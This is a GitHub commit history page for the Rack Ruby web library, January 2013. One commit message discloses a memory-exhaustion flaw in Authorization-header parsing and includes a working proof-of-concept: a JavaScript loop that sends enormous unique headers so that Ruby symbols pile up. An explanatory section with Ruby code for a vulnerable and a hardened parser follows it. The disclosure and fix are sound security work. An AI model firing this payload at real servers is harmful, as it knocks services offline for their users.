Commits on Jan 22, 2013
  1. Switch to RFC 2822 expires

    raggi committed Jan 22, 2013
Commits on Jan 21, 2013
  1. Fix a long standing misnomer for date formats

    References #414
    raggi committed Jan 21, 2013
  2. Use Dir.tmpdir instead of hardcoded /tmp

    Closes #492
    raggi committed Jan 21, 2013
  3. Don't modify the middleware hash in Rack::Server

     * Closes #498
    raggi committed Jan 21, 2013
  4. Merge pull request #496 from homakov/patch-3

    Remove never called string
    raggi committed Jan 21, 2013
Commits on Jan 14, 2013
  1. Remove never called string

    Previous check `p.empty?` makes sure that p contains at least 1 symbol.
    After `.split('=', 2)` k or v or both will turn into some string which means `k || v` will always return true and `next` will never be called.
    homakov committed Jan 14, 2013
Commits on Jan 13, 2013
  1. Update to 1.5.0.beta.2

    raggi committed Jan 13, 2013
  2. Update README security notes

    raggi committed Jan 13, 2013
  3. Rack::Auth::AbstractRequest#scheme returns strings

     * This is a breaking API change, but doesn't appear to be used in public
    raggi committed Jan 13, 2013
  4. Squash test warnings

    raggi committed Jan 13, 2013
  5. Squash warnings in spec_auth

    raggi committed Jan 13, 2013
  6. Reimplement auth scheme fix

     * Add Rack::Auth.add_scheme to enable folks to fix anything that breaks
     * Add common auth schemes, MS ones, AWS ones, etc are missing, as unlikely
     * Checked Rails - they don't use our authorization code
     * Checked Warden - uses rails
     * Checked Omniauth - uses rails
     * Checked doorkeeper - uses rails
     * Checked rack-authentication - does its own thing
     * Checked warden-oauth - doesn't do headers
     * Checked devise - uses rails
     * Checked oauth2-rack - header creation only
     * Checked rack-oauth2-server - does its own thing
     * Probably missed a bunch, but that'll have to do
    raggi committed Jan 13, 2013
  7. Revert "Merge pull request #494 from homakov/patch-2"

    This reverts commit 9b76e4f, reversing
    changes made to bf32f4b.
    raggi committed Jan 13, 2013
  8. Merge pull request #494 from homakov/patch-2

    Remove .to_sym in Authorization scheme
    rkh committed Jan 13, 2013
  9. Remove .to_sym in Authorization scheme

    Hello, `.to_sym` should never be applied to user input. Thus I recommend you change the `scheme` method:
    ```
      def scheme
        @scheme ||= parts.first.downcase.to_sym
      end
    ```
    While we can't send an enormous amount of `Authorization` headers, we can make it as long as possible.
    This is PoC. App:
    ```
    cat config.ru 
    require 'rack'
    run lambda{|e|
        auth =  Rack::Auth::Basic::Request.new(e)
        puts auth.basic? if auth.provided?
        puts Symbol.all_symbols.size
        [200, {'Content-Type'=>'text/html'},['IM FINE']]
    }
    ```
    Simple Javascript to DoS it:
    ```
    var base = ["aa", "ab", "ac", "ad", "ae", "af", "ag", "ah", "ai", "aj", "ak", "al", "am", "an", "ao", "ap", "aq", "ar", "as", "at", "au", "av", "aw", "ax", "ay", "az", "ba", "bb", "bc", "bd", "be", "bf", "bg", "bh", "bi", "bj", "bk", "bl", "bm", "bn", "bo", "bp", "bq", "br", "bs", "bt", "bu", "bv", "bw", "bx", "by", "bz", "ca", "cb", "cc", "cd", "ce", "cf", "cg", "ch", "ci", "cj", "ck", "cl", "cm", "cn", "co", "cp", "cq", "cr", "cs", "ct", "cu", "cv", "cw", "cx", "cy", "cz", "da", "db", "dc", "dd", "de", "df", "dg", "dh", "di", "dj", "dk", "dl", "dm", "dn", "do", "dp", "dq", "dr", "ds", "dt", "du", "dv", "dw", "dx", "dy", "dz", "ea", "eb", "ec", "ed", "ee", "ef", "eg", "eh", "ei", "ej", "ek", "el", "em", "en", "eo", "ep", "eq", "er", "es", "et", "eu", "ev", "ew", "ex", "ey", "ez", "fa", "fb", "fc", "fd", "fe", "ff", "fg", "fh", "fi", "fj", "fk", "fl", "fm", "fn", "fo", "fp", "fq", "fr", "fs", "ft", "fu", "fv", "fw", "fx", "fy", "fz", "ga", "gb", "gc", "gd", "ge", "gf", "gg", "gh", "gi", "gj", "gk", "gl", "gm", "gn", "go", "gp", "gq", "gr", "gs", "gt", "gu", "gv", "gw", "gx", "gy", "gz", "ha", "hb", "hc", "hd", "he", "hf", "hg", "hh", "hi", "hj", "hk", "hl", "hm", "hn", "ho", "hp", "hq", "hr", "hs", "ht", "hu", "hv", "hw", "hx", "hy", "hz", "ia", "ib", "ic", "id", "ie", "if", "ig", "ih", "ii", "ij", "ik", "il", "im", "in", "io", "ip", "iq", "ir", "is", "it", "iu", "iv", "iw", "ix", "iy", "iz", "ja", "jb", "jc", "jd", "je", "jf", "jg", "jh", "ji", "jj"];
    var total_sent = 0
    for(var num in base){
    	var x = new XMLHttpRequest;
    	x.open('GET','/'); 
    	str = '';
    	for(i=0;i<2000000;i++){
    	    str+='Ё'+base[num]+i;
    	}
    	x.setRequestHeader('Authorization',str+' lol')
    	x.send();
    	console.log('Total sent: ',total_sent+=str.length);
    }
    ```
    When we run the JS, every request carries 18888890 letters in a symbol. This 'data' will never be garbage collected.
    Should it be fixed?
    homakov committed Jan 13, 2013
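The commit message above shows why interning the `Authorization` scheme is a memory-exhaustion risk, and the follow-up commits on this page ("Rack::Auth::AbstractRequest#scheme returns strings" and "Add Rack::Auth.add_scheme") describe the shape of the fix. The following Ruby is an added example, not Rack's own code: a minimal stand-in for the header parsing in `Rack::Auth::AbstractRequest`, once in the interning form the patch removes and once in a hardened form that keeps the scheme a `String` and checks it against a fixed allow-list. The class names `SchemeBefore`/`SchemeAfter`, the `symbols_added` helper, the allow-list contents and the sample requests are all constructed for this example; only the Rack env key names are real.

```ruby
require 'set'

# Rack env keys under which the Authorization header may arrive.
AUTHORIZATION_KEYS = %w[HTTP_AUTHORIZATION X-HTTP_AUTHORIZATION X_HTTP_AUTHORIZATION].freeze

# Before: client-controlled text goes through String#to_sym, so every distinct
# scheme token becomes an entry in the process-wide symbol table for as long as
# the symbol is referenced. Callers check provided? first, as in Rack.
class SchemeBefore
  def initialize(env)
    @env = env
  end

  def provided?
    !authorization_key.nil?
  end

  def parts
    @parts ||= @env[authorization_key].split(' ', 2)
  end

  def scheme
    @scheme ||= parts.first.downcase.to_sym
  end

  private

  def authorization_key
    @authorization_key ||= AUTHORIZATION_KEYS.find { |k| @env.key?(k) }
  end
end

# After: the scheme stays a String (nothing is interned), and callers compare it
# against a fixed allow-list instead of trusting whatever the client sent.
class SchemeAfter < SchemeBefore
  KNOWN_SCHEMES = Set.new(%w[basic digest bearer]).freeze # hypothetical list

  def scheme
    @scheme ||= parts.first.downcase
  end

  def known_scheme?
    KNOWN_SCHEMES.include?(scheme)
  end
end

# Helper (constructed): how many symbols a block leaves in the symbol table.
# GC.start first so stale dynamic symbols don't skew the baseline; the block's
# return value is held in a local until after counting so nothing it created is
# collected early.
def symbols_added
  GC.start
  before = Symbol.all_symbols.size
  kept = yield
  delta = Symbol.all_symbols.size - before
  kept.clear if kept.respond_to?(:clear) # release only after the count is taken
  delta
end

# Constructed requests: each carries a unique, never-seen scheme token, which is
# the pattern the PoC above relies on.
def sample_envs(count)
  (1..count).map { |i| { 'HTTP_AUTHORIZATION' => "custom#{i}-#{rand(1 << 32)} token" } }
end

def demo
  normal = { 'HTTP_AUTHORIZATION' => 'Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==' }
  stable = symbols_added { sample_envs(1000).map { |e| SchemeAfter.new(e).tap(&:scheme) } }
  grown  = symbols_added { sample_envs(1000).map { |e| SchemeBefore.new(e).tap(&:scheme) } }
  {
    before_type: SchemeBefore.new(normal).scheme.class,              # Symbol
    after_type: SchemeAfter.new(normal).scheme.class,                # String
    after_known: SchemeAfter.new(normal).known_scheme?,              # true
    after_unknown: SchemeAfter.new(sample_envs(1).first).known_scheme?, # false
    symbols_grown_before: grown,  # about 1000: one new symbol per request
    symbols_grown_after: stable   # 0: client input is never interned
  }
end

puts demo if __FILE__ == $0
```

The interesting number is `symbols_grown_before`: each request with a fresh scheme token adds a symbol that lives as long as the request object does, and on Rubies without symbol GC (the 1.9/2.0 era this commit targets) it lives forever. The hardened form grows nothing, and `known_scheme?` gives the application a place to reject unknown schemes outright, which is the role `Rack::Auth.add_scheme` plays in the later commit.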
Commits on Jan 11, 2013
  1. Merge branch 'hijack'

    * hijack:
      Hijack SPEC changes after review discussion
      Add straw man for the after-headers hijack
      Straw man for rack.hijack*, connection hijacking!
    raggi committed Jan 11, 2013
  2. Add q-value helpers for Accept headers, etc.

     * Supersedes and closes #443
    raggi committed Jan 11, 2013
  3. Minor code review comments closing #451

     * Adds documentation
     * find is preferred over detect
     * Superseded body objects should be closed
    raggi committed Jan 11, 2013
  4. Revert "Set TMPDIR to fix Dir.mktmpdir under jRuby"

    This reverts commit 3b24fa9.
    raggi committed Jan 11, 2013
  5. Merge branch 'sendfile_path_mapping' of git://github.com/Casecommons/rack into sendfile

    * 'sendfile_path_mapping' of git://github.com/Casecommons/rack:
      Set TMPDIR to fix Dir.mktmpdir under jRuby
      Additional Ruby 1.8 compatibility
      Make spec_sendfile work with Ruby < 1.9
      Initialize Rack::Sendfile with accel mappings
    raggi committed Jan 11, 2013
  6. Enable unix sockets with paths as trusted proxies

     * Supersedes and closes #488
    raggi committed Jan 11, 2013
  7. Merge pull request #491 from spastorino/allow_build_different_session_object

    Allow subclasses to build a different Session Object
    raggi committed Jan 11, 2013
  8. Merge pull request #490 from slivu/master

    Added Reel Web Server and Espresso Framework to supported software list
    raggi committed Jan 11, 2013
  9. Merge pull request #489 from spastorino/abstract_id_tiny_patches

    Abstract id tiny patches
    raggi committed Jan 11, 2013
Commits on Jan 10, 2013
  1. Update README.rdoc

    slivu committed Jan 10, 2013
Commits on Jan 9, 2013
Commits on Jan 7, 2013
  1. Merge pull request #487 from carlosantoniodasilva/remove-warnings

    Remove warnings: 'not used variable' and 'shadowing outer variable'
    raggi committed Jan 7, 2013